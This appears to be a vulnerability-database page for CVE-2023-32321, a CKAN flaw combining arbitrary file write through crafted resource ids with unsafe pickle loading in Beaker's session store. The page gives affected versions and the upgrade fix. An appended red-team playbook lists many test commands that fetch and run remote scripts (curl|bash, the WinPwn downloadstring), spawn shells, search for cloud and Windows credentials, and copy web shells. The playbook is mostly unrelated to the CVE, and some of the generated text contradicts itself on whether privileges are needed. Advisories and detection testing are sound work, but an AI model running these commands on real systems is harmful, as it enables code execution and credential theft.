CVE-2023-32321
Overview
The vulnerability arises from improper input validation and unsafe deserialization within CKAN's resource management and session handling components. Specifically, arbitrary file write occurs through manipulation of resource identifiers in resource_create and package_update actions via the ResourceUploader object. Additionally, insecure deserialization is triggered by Beaker's session store when configured with the file backend, enabling execution of malicious pickle data. These flaws affect CKAN's resource upload and session management modules.
Vulnerability Description
CKAN is an open-source data management system for powering data hubs and data portals. Multiple vulnerabilities have been discovered in Ckan which may lead to remote code execution. An arbitrary file write in `resource_create` and `package_update` actions, using the `ResourceUploader` object. Also reachable via `package_create`, `package_revise`, and `package_patch` via calls to `package_update`. Remote code execution via unsafe pickle loading, via Beaker's session store when configured to use the file session store backend. Potential DOS due to lack of a length check on the resource id. Information disclosure: A user with permission to create a resource can access any other resource on the system if they know the id, even if they don't have access to it. Resource overwrite: A user with permission to create a resource can overwrite any resource if they know the id, even if they don't have access to it. A user with permissions to create or edit a dataset can upload a resource with a specially crafted id to write the uploaded file in an arbitrary location. This can be leveraged to Remote Code Execution via Beaker's insecure pickle loading. All the above listed vulnerabilities have been fixed in CKAN 2.9.9 and CKAN 2.10.1. Users are advised to upgrade. There are no known workarounds for these issues.
Impact
An unauthenticated attacker can exploit these vulnerabilities to perform remote code execution, denial of service, and unauthorized data access or modification. Exploitation requires the ability to create or edit resources or datasets, which may be granted to authenticated users with specific permissions. Successful attacks can lead to full system compromise, data breaches, and service disruption. The CVSS vector indicates network attack with low complexity and no privileges required, emphasizing the criticality of these flaws.
Solution
Users should upgrade CKAN to versions 2.9.9 or 2.10.1 or later, as these releases contain fixes addressing all identified vulnerabilities. Detailed patch information and upgrade instructions are available in the CKAN GitHub security advisory GHSA-446m-hmmm-hm8m at https://github.com/ckan/ckan/security/advisories/GHSA-446m-hmmm-hm8m. No effective workarounds exist; therefore, timely application of the vendor-provided patches is essential.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerabilities identified in the open-source data management system CKAN present significant security risks, primarily due to the potential for remote code execution and unauthorized access to sensitive resources. The core issues stem from improper handling of user inputs during actions such as resource creation and package updates. Specifically, the `ResourceUploader` object allows users with permission to create resources to specify arbitrary file paths, leading to the possibility of writing files to unintended locations on the server. Additionally, the use of unsafe pickle loading in Beaker's session store, particularly when configured to use the file session store backend, exposes the system to remote code execution attacks. This combination of factors creates a critical vulnerability landscape that can be exploited by malicious actors.
Attack vectors for exploiting these vulnerabilities are varied and can be executed with relative ease by users with minimal permissions. For instance, an attacker could leverage the arbitrary file write capability by crafting a resource with a specially designed ID, allowing them to overwrite existing resources or create new files in sensitive locations. Furthermore, the lack of proper length checks on resource IDs could enable denial-of-service attacks, potentially disrupting service availability. The ability to access and manipulate resources without appropriate permissions poses a severe risk, as attackers could gain insights into sensitive data or disrupt operations by overwriting critical resources.
The real-world impact of these vulnerabilities is profound, particularly for organizations relying on CKAN for data management and public data portals. The potential for remote code execution could lead to complete system compromise, allowing attackers to execute arbitrary code on the server, exfiltrate sensitive data, or disrupt services. This not only jeopardizes the integrity and confidentiality of the data managed by CKAN but also poses significant business risks, including reputational damage, regulatory penalties, and financial losses. Organizations that fail to address these vulnerabilities may find themselves exposed to targeted attacks, leading to severe operational disruptions and loss of stakeholder trust.
To detect and mitigate these vulnerabilities, organizations using CKAN should prioritize upgrading to the latest patched versions, specifically CKAN 2.9.9 and 2.10.1, which address the identified issues. Regular security audits and vulnerability assessments should be conducted to identify any potential weaknesses in the system. Additionally, implementing strict access controls and monitoring user activities can help mitigate the risk of unauthorized resource manipulation. Employing security best practices, such as input validation and output encoding, can further reduce the attack surface and enhance the overall security posture of the CKAN deployment.
In conclusion, the vulnerabilities in CKAN present a critical threat that organizations must address promptly. The combination of remote code execution capabilities, unauthorized access to resources, and potential denial-of-service scenarios creates a compelling case for immediate action. By upgrading to secure versions and implementing robust security measures, organizations can significantly reduce their risk exposure and safeguard their data management systems against exploitation. The evolving threat landscape necessitates a proactive approach to cybersecurity, ensuring that systems like CKAN remain resilient against emerging threats.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Okfn | Ckan | All |
cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:*
|
|
|
Okfn | Ckan | 2.10.0 |
cpe:2.3:a:okfn:ckan:2.10.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-32321 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/ckan/ckan/security/advisories/GHSA-446m-hmmm-hm8m |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ckan/ckan/blob/2a6080e61d5601fa0e2a0317afd6a8e9b7abf6dd/CHANGELOG.rst |